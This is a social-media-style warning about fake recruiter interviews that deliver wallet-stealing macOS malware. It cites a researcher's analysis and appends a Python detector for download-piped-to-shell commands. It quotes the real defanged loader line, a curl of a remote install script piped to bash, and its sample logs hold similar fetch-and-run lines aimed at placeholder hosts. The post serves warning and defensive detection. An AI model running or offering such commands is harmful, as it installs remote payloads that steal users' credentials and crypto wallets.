be careful of fake job interviews. they are now one of the cleanest malware delivery vectors.


my brother almost got hit this week.
the play, step by step:
> a "recruiter" pings him on linkedin
> they've actually read his cv. they know his stack. they book a real interview slot.
> a few hours before the call: "can you review our product page real quick before we talk?"
> visiting the site runs this in the background:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
if you type your password when it prompts, it's over.
a researcher (Darksp33d on GitHub) reverse-engineered the binary:
> every config string encrypted with 570 unique custom functions
> once unwrapped: full c2 server, complete endpoint list, and a sentry error-tracking dsn that ties back to the developer under legal subpoena
> 276 targeted chrome extension ids, covering 188 crypto wallets
> ttp overlap with dprk "contagious interview" is strong
> 9/64 on virustotal. crowdstrike, sophos, malwarebytes, all missed it
real recruiters, real cvs, real interview slots, real-looking site. one curl line drains your wallets.
if a "recruiter" ever asks you to run anything in your terminal, even something as innocent as a build script before a tech interview, close the tab.
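added example, not code from the post or from the researcher's write-up: a small python detector for the download-to-shell shape of that one curl line (a fetch tool piped, possibly via nohup or sudo, into a shell interpreter) run over constructed process-execution log lines; the allowlist host and the log format are assumptions for the example.

```python
import re
from typing import Optional

# Shape of the loader line quoted above: a download tool whose output is piped,
# possibly through nohup/sudo, straight into a shell, and optionally backgrounded.
PIPE_TO_SHELL = re.compile(
    r"\b(?P<tool>curl|wget)\b(?P<args>[^|;]*?)\|\s*(?:nohup\s+)?(?:sudo\s+)?"
    r"(?P<shell>bash|sh|zsh)\b(?P<rest>[^|;]*)",
    re.IGNORECASE,
)
# First host-like token in the download arguments, with or without a scheme.
HOST = re.compile(r"(?:https?://)?(?P<host>[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)")
# Hosts an org deliberately allows to serve install scripts (constructed allowlist).
ALLOWED_HOSTS = {"pkgs.corp.example"}


def inspect_cmdline(cmdline: str) -> Optional[dict]:
    """Return a finding for a download-to-shell command line, else None."""
    m = PIPE_TO_SHELL.search(cmdline)
    if not m:
        return None
    host_match = HOST.search(m.group("args"))
    host = host_match.group("host").lower() if host_match else None
    return {
        "tool": m.group("tool").lower(),
        "shell": m.group("shell").lower(),
        "host": host,
        # nohup or a trailing '&' means the loader keeps running after the prompt returns
        "detached": "nohup" in cmdline or m.group("rest").rstrip().endswith("&"),
        "allowed": host in ALLOWED_HOSTS,
    }


def scan_log(lines):
    """Yield (line_no, finding) for every download-to-shell line not on the allowlist."""
    for n, line in enumerate(lines, 1):
        f = inspect_cmdline(line)
        if f and not f["allowed"]:
            yield n, f


# Constructed process-execution log lines (not real telemetry; hosts are placeholders).
SAMPLE_LOG = [
    "pid=4021 user=alice cmd=ls -la ~/projects",
    "pid=4022 user=alice cmd=curl -s http://pkgs.corp.example/setup.sh | bash",
    "pid=4023 user=alice cmd=curl -s cdn.evil.invalid/install | nohup bash &",
    "pid=4024 user=alice cmd=wget -qO- https://drop.evil.invalid/x.sh | sudo sh",
    "pid=4025 user=alice cmd=curl -s https://api.corp.example/a.tgz | shasum -a 256",
]

if __name__ == "__main__":
    for n, f in scan_log(SAMPLE_LOG):
        print(f"line {n}: {f['tool']} -> {f['shell']} from {f['host']} detached={f['detached']}")
```

the `shasum` line is there on purpose: the word-boundary after the shell name keeps `| shasum` from being read as `| sh`, which is the false positive a naive substring match would raise.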